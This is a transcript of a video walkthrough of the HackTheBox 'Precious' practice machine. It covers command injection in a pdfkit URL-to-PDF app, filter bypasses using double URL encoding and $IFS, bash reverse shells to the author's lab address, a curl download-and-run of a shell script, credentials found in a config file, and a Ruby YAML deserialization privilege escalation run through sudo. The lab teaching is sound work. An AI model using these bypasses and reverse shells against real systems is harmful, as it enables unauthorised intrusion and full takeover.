What's going on YouTube? This is Ipsec. I'm doing Precious from HackTheBox, which is an easy box as long as you're good about going online when you get stuck and doing some research to get yourself unstuck. And I know that sounds easy, but the initial foothold is just a web page that will take a URL and convert that URL to a PDF. Now, the command injection is trivial to find, but there's a lot of weird things around the command injection that you just will have a lot of trouble with. For example, spaces don't work that well in command injection. We'll dig in and get it working, but it's just weird, right? So if you don't figure out the trick, which is putting a space beforehand and making sure that space is double URL encoded, you'll have a lot of trouble trying to run any useful commands out of the command injection. And then the prevesc is a deserialization in Ruby. If you don't do a lot of research, you may be running some deserialization exploits that don't work with your version of Ruby. And if you just did that little bit and got the correct one, it just works right away. So with that being said, let's jump in. As always, I'm going to start with an nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the nmap directory and call it Precious, then the IP address of 10.10.11.189. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian server. We also have Nginx on port 80. Its version is 1.18, and it's redirecting us to precious.htb. So we could go to 10.10.11.189. We see it changes to precious.htb, so we should just add this into our host file. So I'm going to copy this. Then we can do sudo v etc host, and then 10.10.11.189, put in the host name, refresh the page, and we get a, page. It says convert web page to PDF and a URL to fetch. So the first thing I'm going to do is try like file etc passwd to see exactly what happens here. And it wants us to provide a valid URL. So we could provide our own server. So 10.10.14.8 is my IP address. We should listen on port 80. So sudo nc lvnp 80, and then click submit. And we see it connects right back to us. The user agent is going to be Mozilla. We do see a WK HTML to PDF and not much more information here. One of the things I always test for is just like command injection. So a simple way to do this would be setting up the netcat again. We don't even have to go in Burp Suite at this point. We could just try like a dollar, I'll do who am I, right? So if it just gets HTTP, we don't really have command injection. If it gives us the dollar who am I, we definitely don't. If it gives us a username, we would, right? So if I click submit here, we can see we got /Ruby. So we definitely have command injection. The next thing to do would be try like a reverse shell. And I'm going to right now make a directory www, go in here, and I'm going to start a Python server on port 80. Let's see, Python 3, I forgot the -m for module. And the reason why I'm doing that is just so I can have multiple requests going in. I can just see the URL easily. If I just did it through netcat, it just floods the screen, right? I could use the -k to keep open, but it puts like 7 or 8 lines per request, and that's just messy, right? So I'm going to do nc lvnp 9001, and we're going to try this again. So HTTP, then we can do --c, then a single quote, --i, dev tcp 10.10.14.8, 9001, 0, and 1 like this. And that's terminated. Click on submit. We see a get, but we don't have a shell. And we get the PDF. If I open the PDF, it's just giving us the output of our web server. So we can now send this over to Burp Suite. Let's make sure, I don't have Burp Suite open. So let's open it up. And once it's open, we'll just send it there. And the reason why I'm doing this is just so I have full control over like URL encoding and things like that. Also, it's a bit easier to send the request multiple times instead of using the web page every time and having the text box, right? And of course, Burp Suite decides to open right when I want to do this. So While it goes, let's see. It's being a pain. I'm just going to, well, I was going to pause the video and continue, but as soon as I said that, Burp Suite behaved, and we are now open. So I can go into the repeater tab after proxy is set to intercept. There we go. Submit it. Send this over to repeater. And it's URL encoding the whole thing. That is good. So we'll just do Control U, send it, confirm the same behavior. I'm going to get rid of a reverse shell. We'll do uname, send it, and we see it's /Linux, right? If I did who am I, that's what it was, Ruby. So I'm going to try maybe finding a bad character. Let's do uname-a. So if I send this, we get a PDF, and, well, did we get a PDF? Yeah, we did. And we don't have the uname output. If I just do uname without the -a, it gives us a web server that says cannot load remote URL, and it does a get on Linux. I'm guessing that's because this is a 404. So I'm going to go in www real quick. I'm going to touch Linux so it's not a 404. I'm going to refresh this page, and we still cannot load remote URL. I'm not sure exactly why that is, but that is what it's saying. Who am I? Cannot load. We get Ruby. So we want to try to figure out a space. In Linux, we can do like, gets its bracket expansion. So like uname, comma, -a, if it's in squigglies, will work as a space. So we can try that. So we can put this and then -a. And we still don't have anything. It's just get /. The other thing I could be thinking, maybe it's not a valid parameter. So I'll do like a / q is equal to this. And we just see that. So we don't really have that much to go on. Let's see, maybe $ifs like this could be another way we could do space, I think. I'm not positive on this one. Nothing here. Oh, there we go. So IFS actually worked. I did not expect that. But if we use IFS, and IFS I think defaults to space, we can replace that. And let's just keep going down this path and see if we can get a reverse shell this way. So I'm going to do bash, then let's just do the bash shell real quick. Bash-c 1010 or bash-i dev tcp 10.10.14.8 0 and 1 like that. So I think this is a good reverse shell. Let's just copy and paste it to make sure. Let's see. Bash-c bash-i dev tcp. I forgot the port 9001. That is why we test things, right? So reverse shell works. So what we want to do is replace all the spaces with IFS. So I'm going to do echo, put it in double quotes, sed space $ifs. And I wonder if I'm going to have to escape the dollar. Nope. That looks like it worked. So let's copy and paste this in and see if it works. So we have the shell running. Got to have the Z there. And it doesn't look like that works. Another thing we could do, let's say if we can echo IFS test. Do we get test? We did not. How did that uname work? I am now actually baffled at what happened. So we do uname, we get Linux, $ifs-a, we get the full thing. But if I do echo ifs, please. Oh, because the dash, I guess, is killing the variable? That is a weird edge case. %20, please. Let's see. That doesn't work. I don't think I can do that. Nope. Let's see. I'm trying to think of another way we could do this. Because what we want is... I wonder if we URL encode this. Let's see. Right click, convert selection, HTML, or URL, all characters, 7b. This would probably be 7c, 7d. Do we get please? We don't. So it's something with that dash. I'm trying to think if there's an easy way we can get this working, but I can't think of it off the top of my head. Because I want to do like a base 64 encode, but this will get invalid input, right? And I don't know how else I can terminate this IFS variable. So let us now go back here and we'll get a PDF. So let's just disable Burp Suite, submit this. Let's see. I'm going to refresh the page. HTTP 10.10.14.8. Submit. Save the file. And how did it save? It is 4AK. So we'll CP, we'll move from downloads 4AK. And then if we do an exif tool against it, we can see it's generated by pdfkit version 086. So if we went to Google and find a proof of concept, there is this vulnerability on Sneak. And if we look at it, it's talking pretty similar to what we did, except they're putting a space before the command. And also, I don't know exactly what the dollar bracket is doing, but I think the space was the key part. They're also just using backticks. We did not use backticks, we used the dollar, but I think both of those are just fine. So let's try the sleep command, right? So if we paste this in, and we probably want to, I would guess, put a %20 here. Let's see. That's URL encoded already. I don't know what I just did. I don't know where that FQ came from, but it worked. Oh, I URL encoded the question mark. So that's sleeping for 5 seconds and the request takes a second. So if I do sleep 2, we should see like 2.9, I would guess, or 3. That is good. So we had to URL encode this. So now let's try our reverse shell. So bash-c, bash-i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. Put this in. It's hanging. And if I go back, we have a shell. What's going on, YouTube? This is Ip from the future. And that whole IFS trick, I found that live in the recording, so it may have been a little bit more confusing. I still don't know exactly what's going on in this exploit, but I do kind of just want to show it because there's some really cool behavior with this thing. And if you're trying to find things blind, maybe this can help you. So to revisit, we have command injection right here. If we do who am I, we can see Ruby, right? And the really weird behavior in this is when it comes to spaces. So we do uname, it's going to say Linux. That is fine with us. But if we do -a, we just get nothing. If we, let's see, if we do a %20 here, we still just get the %20. It doesn't go on to say Linux, right? But if we double URL encode this, so %2520, now we can have spaces. And this is where we went to and got sleep and everything working, right? But let's say this little space trick did not work. Where would we go from that, right? And that's why I showed the IFS. And this also works. We see Linux here. It's not beginning with a space like it does here. And this is good until you realize there's a lot of non-special characters we want to put after IFS, right? Because this is working because of the hyphen here. This is terminating it because it's, I guess, not a valid thing for the variable name. So if I did echo and we do please subscribe here, we don't get please subscribe. And that's because this variable is no longer just IFS, it is IFS please subscribe. So if we did a character that's not valid for the variable, like the dash, then it's going to say dash please subscribe. Now that's annoying because we don't always want to put a dash here. And then after recording the video, I figured we could fix this. Well, during the video, I guess, we tried putting it in brackets and that doesn't work. I talked to OXDF. He was like, maybe it's a templating language. You got to escape it. And the way you do that normally is through double brackets. You can potentially do it through backslashes. So we could try that. I'm just going to do a few of these to show it doesn't work. And I don't think it does. But I didn't think IFS would work when I was recording this video for the first time because I only tried the brace expansion with squigglies and commas, right? So this is just me doing my due diligence and showing all the behavior. So these are the things that we try, right? We just send it a lot and look, and we always get nothing. So it doesn't have to do with escapes. Well, what we could do is kind of what this IFS trick is by default. This is, I think, called internal field separator, if I remember correctly. And by default, that's going to be a space. So that's why this works. Well, what if we just did a junk variable like this? What happens? We get please subscribe and there's no dash, right? Because the $ is also an invalid variable thing. So by saying $ifs, we get the space, and then we just give it a junk variable that doesn't exist. So like $hyphen, and the hyphen gets trashed. This gets treated as null and just goes to please subscribe. So now that we know this trick, we can write a curl, right? So we could do curl, then IFS, and we want -o to write to an out file. Then we can say dev shm, we'll call it shell.sh, and then, so after O, we probably want another IFS here. And I'm guessing we're safe to do this because slash is not a valid thing. So I'm going to try writing to shell.sh, and then we do a $ifs, and now we want to put the URL. And if we just started with HTTP, that's going to get treated as a variable. So I'm going to put a $hyphen, and we can say 10.10.14.8/woot. So let's make sure this file exists. So I'm going to v-woot, and we'll do bin bash --i dev tcp 10.10.14.8 9001 0 and 1, like this. Okay. chmod plus x woot. Well, we didn't even need to make that executable because that's going to be going to the server. So if I run this, we see it does a get on woot. So I think my curl command ran. So I am listening on 9001. So what if I now just do a bash? I'm going to do it in a new repeater window, and we'll say bash ifs dev shm shell.sh. Run it. It's hanging, and we get a shell. So that's how we could have done it without putting that space beforehand. So hopefully you enjoyed that. I think this IFS trick is super versatile. The reason why we didn't do the like bash one-liner, like bash-c, bash-i thing is that it has a lot of special characters and that'd be a pain to deal with here. Outside of recording, I did test pipes, and the pipes don't lead to command execution. It just prints it in the output. So that's why we're not using pipes either. This is the best way to do it in 2 requests. Just download the file and execute it. So with that being said, let's just get back to the video where we have a shell as Ruby. And we are the Ruby user, and we're in this PDF app. So I'm going to do Python 3-c, import pty spawn, bin bash, fix that typo, Control Z, stty raw minus echo foreground, hit enter twice. So now we have the up arrows and stuff. So in this file, we do have a config. Config is a directory. If we go in it, there is environment, and we can look at how this is, and we don't see anything sensitive here, right? There is config.ru, and it's just run PDF controllers, so nothing sensitive there. If we do find.-type f, I'm going to export term is equal to xterm so I can clear the screen, rerun that find command, and it doesn't look like there's going to be any sensitive files. I was looking for if it like connected to a database or something like that. I'm going to go in my home directory, and we're going to run ls, and we don't see anything here. We do find.-type f here. We can see there is a bundle and config. So let's try catting this file. So cat, copy, paste, and we see it's going to rubygems.org, and it has credentials, Henry, and this password. So if I cat etc passwd, we do have Henry as a user on this system. So why don't we just try and SSH in? So I'm going to get rid of this web server since we don't need it anymore. Let's cat the same thing we did. Copy. Whoops, I did paste again. Copy. SSH Henry at precious. Whoops. Precious.htb. Yes. Paste in the password. Permission denied. That is not what I expected to paste. Control Shift insert was the password. And now we're logged in as Henry. If we do lsla, we just have the user.txt and not much here. We can do a sudo-l. And I always check sudo whenever I have a credential, just because sometimes sudo asks you for a password and you know it here, right? If I tried it on here first, it wants me to put the password for the Ruby user. Don't know it, so I can't view the list, right? So that's why sudo isn't normally my first go-to if I don't have the user's password already, because I don't want to run it and get the password wrong, because that creates more audit events. If you run it, have the password right the first time, it's much less suspicious, right? So looking at sudo, we do see we can do user bin ruby on opt update dependencies.rb. So if we look at this file, actually I'm going to vim it so we have syntax highlighting, and of course vim isn't installed. So let's look at it. We're requiring YAML, then requiring Ruby gems, update, we load a file, gem specification. Looking at this, it's not really doing anything. I don't know where any type of user input or things like that can happen. It is doing require YAML, so my first thought is maybe if I create like a YAML.rb file or ru, I don't know what the extension of Ruby was. If we went back up here, let's see, where's that find when we're in this directory? I think it's RB, right? Yeah, pdf.rb. So if we do lsla, we can touch, we'll do test real quick. Permission denied. So we can't touch files in this directory. We can do a sudo-l, see how we run it. And we can go to dev shm, run this command, and it wants us to have a dependencies.yaml file. So I'm going to copy the opt sample dependencies YAML into dev shm, run it again, and it's telling us what we'd expect, right? So if I cat the opt dependencies, I'm going to try touching, touch YAML.rb, rerun it, and if it errors, it tried to load the YAML Ruby library from my current working directory, which it did not do. So that's not it. The other thing we could do is Google. So Ruby YAML deserialization. And one of the first post is a blind remote code execution through YAML deserialization. And essentially, it says when doing a YAML thing in Ruby, you shouldn't just blindly accept user input. And here, let's see, they're doing a sleep for 10 minutes, I believe, right here. So let's grab this YAML file, v dependencies. My shell is dead. That is weird. Is my shell dead here? Let's see, I'm going to restart my VPN. There we go. Not sure exactly what happened there. So let's paste in this. I'm going to undo it, set my mode to paste it in just because it looked a little funny to me, but maybe not. This git set, I'm just going to run ID real quick. So now I'm going to do my sudo command, and mapping values are not allowed in this context. So that doesn't look like it worked. Here it's doing a request to collaborator. Now it's sending a reverse shell. I'm going to try maybe a different payload. I always like going to payload all the things when I see a reference to it. It's generally documented pretty well. We can see this is a universal gadget for Ruby before 2.7.2. So let's take a look at my Ruby version. We're 2.7.4. So I'm not going to use this one. This is for 2 to 3. And this looks very similar to what I just did. Oh, did some cleanup script delete my dependencies? dependencies.yaml. That is annoying. Set paste. Paste this in. Let's run sudo again. We got another error, but if we go up to the top, we see it running the command. We have the output of ID. So let us go back into dependencies, and I'm just going to put a reverse shell here. So bash-i dev tcp 10.10.14.8 9001 0 and 1 like this. And let's see, nclvmp 9001. Rerun sudo, and there we are. We are root at Precious. So I can go to /root, and we can get the flag. So that was the box. A nice, simple, easy box. Hope you guys enjoyed it. Take care, and I will see you all next week.